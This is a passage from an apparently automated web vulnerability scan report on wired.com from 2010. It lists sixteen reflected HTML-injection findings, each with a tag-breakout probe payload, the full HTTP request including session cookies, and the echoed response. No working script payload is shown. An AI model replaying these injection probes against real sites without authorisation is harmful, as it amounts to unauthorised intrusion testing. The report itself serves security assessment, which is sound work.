Content-Type: text/html; charset=UTF-8
Content-Length: 29361
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:21 GMT
Date: Sun, 21 Nov 2010 23:07:21 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment ss_music4db81"><a>8eb418e94bf c_news">
...[SNIP]...

1.121. http://www.wired.com/entertainment/music/news/2004/04/63263 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/music/news/2004/04/63263

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70d39"><a>b304160c724 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment/music/news70d39"><a>b304160c724/2004/04/63263 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29361
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:36 GMT
Date: Sun, 21 Nov 2010 23:07:36 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment ss_music c_news70d39"><a>b304160c724">
...[SNIP]...

1.122. http://www.wired.com/entertainment/music/news/2005/07/68124 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/music/news/2005/07/68124

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f72e"><a>b56d3b0469f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment8f72e"><a>b56d3b0469f/music/news/2005/07/68124 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29361
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:29 GMT
Date: Sun, 21 Nov 2010 23:07:29 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment8f72e"><a>b56d3b0469f ss_music c_news">
...[SNIP]...

1.123. http://www.wired.com/entertainment/music/news/2005/07/68124 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/music/news/2005/07/68124

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8292"><a>527abd9bf12 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment/musicd8292"><a>527abd9bf12/news/2005/07/68124 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29361
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:18:02 GMT
Date: Sun, 21 Nov 2010 23:08:02 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment ss_musicd8292"><a>527abd9bf12 c_news">
...[SNIP]...

1.124. http://www.wired.com/entertainment/music/news/2005/07/68124 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/music/news/2005/07/68124

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 794ab"><a>79fd2601542 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment/music/news794ab"><a>79fd2601542/2005/07/68124 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29361
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:18:22 GMT
Date: Sun, 21 Nov 2010 23:08:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment ss_music c_news794ab"><a>79fd2601542">
...[SNIP]...

1.125. http://www.wired.com/entertainment/theweb [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/theweb

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e0dc"><a>6d583e3f06 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment7e0dc"><a>6d583e3f06/theweb HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29335
Vary: Accept-Encoding
Cache-Control: max-age=219
Expires: Sun, 21 Nov 2010 23:11:12 GMT
Date: Sun, 21 Nov 2010 23:07:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment7e0dc"><a>6d583e3f06 ss_theweb">
...[SNIP]...

1.126. http://www.wired.com/entertainment/theweb [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /entertainment/theweb

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52ebb"><a>01d211d6eae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /entertainment/theweb52ebb"><a>01d211d6eae HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29337
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:18:02 GMT
Date: Sun, 21 Nov 2010 23:08:02 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_entertainment ss_theweb52ebb"><a>01d211d6eae">
...[SNIP]...

1.127. http://www.wired.com/gadgets [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24f0b"><a>06f0bc5b429 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets24f0b"><a>06f0bc5b429 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29331
Vary: Accept-Encoding
Cache-Control: max-age=225
Expires: Mon, 22 Nov 2010 01:14:33 GMT
Date: Mon, 22 Nov 2010 01:10:48 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets24f0b"><a>06f0bc5b429">
...[SNIP]...

1.128. http://www.wired.com/gadgets/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d3c4"><a>44e9ad792ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets5d3c4"><a>44e9ad792ff/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29332
Vary: Accept-Encoding
Cache-Control: max-age=224
Expires: Sun, 21 Nov 2010 20:17:08 GMT
Date: Sun, 21 Nov 2010 20:13:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets5d3c4"><a>44e9ad792ff">
...[SNIP]...

1.129. http://www.wired.com/gadgets/digitalcameras [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/digitalcameras

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20f24"><a>01629cf0b9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets20f24"><a>01629cf0b9a/digitalcameras HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=233
Expires: Sun, 21 Nov 2010 23:11:26 GMT
Date: Sun, 21 Nov 2010 23:07:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets20f24"><a>01629cf0b9a ss_digitalcameras">
...[SNIP]...

1.130. http://www.wired.com/gadgets/digitalcameras [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/digitalcameras

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb0fc"><a>827ec64b19b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets/digitalcamerascb0fc"><a>827ec64b19b HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29364
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:57 GMT
Date: Sun, 21 Nov 2010 23:07:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets ss_digitalcamerascb0fc"><a>827ec64b19b">
...[SNIP]...

1.131. http://www.wired.com/gadgets/displays [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/displays

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bfac"><a>5cabf0c5d32 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets4bfac"><a>5cabf0c5d32/displays HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:11:43 GMT
Date: Sun, 21 Nov 2010 23:07:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets4bfac"><a>5cabf0c5d32 ss_displays">
...[SNIP]...

1.132. http://www.wired.com/gadgets/displays [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/displays

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db025"><a>555d174deea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets/displaysdb025"><a>555d174deea HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29352
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:18:07 GMT
Date: Sun, 21 Nov 2010 23:08:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets ss_displaysdb025"><a>555d174deea">
...[SNIP]...

1.133. http://www.wired.com/gadgets/gadgetreviews [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/gadgetreviews

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dba86"><a>e8f52bb4221 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgetsdba86"><a>e8f52bb4221/gadgetreviews HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29362
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:11:57 GMT
Date: Sun, 21 Nov 2010 23:07:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgetsdba86"><a>e8f52bb4221 ss_gadgetreviews">
...[SNIP]...

1.134. http://www.wired.com/gadgets/gadgetreviews [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/gadgetreviews

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e399"><a>cebb494f95a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets/gadgetreviews1e399"><a>cebb494f95a HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29362
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:18:32 GMT
Date: Sun, 21 Nov 2010 23:08:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets ss_gadgetreviews1e399"><a>cebb494f95a">
...[SNIP]...

1.135. http://www.wired.com/gadgets/mac [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/mac

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8d93"><a>5fa7d6b4d51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgetsa8d93"><a>5fa7d6b4d51/mac HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29342
Vary: Accept-Encoding
Cache-Control: max-age=219
Expires: Sun, 21 Nov 2010 23:11:41 GMT
Date: Sun, 21 Nov 2010 23:08:02 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgetsa8d93"><a>5fa7d6b4d51 ss_mac">
...[SNIP]...

1.136. http://www.wired.com/gadgets/mac [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /gadgets/mac

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 821e8"><a>04b40dd3412 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /gadgets/mac821e8"><a>04b40dd3412 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29342
Vary: Accept-Encoding
Cache-Control: max-age=551
Expires: Sun, 21 Nov 2010 23:17:48 GMT
Date: Sun, 21 Nov 2010 23:08:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_gadgets ss_mac821e8"><a>04b40dd3412">
...[SNIP]...

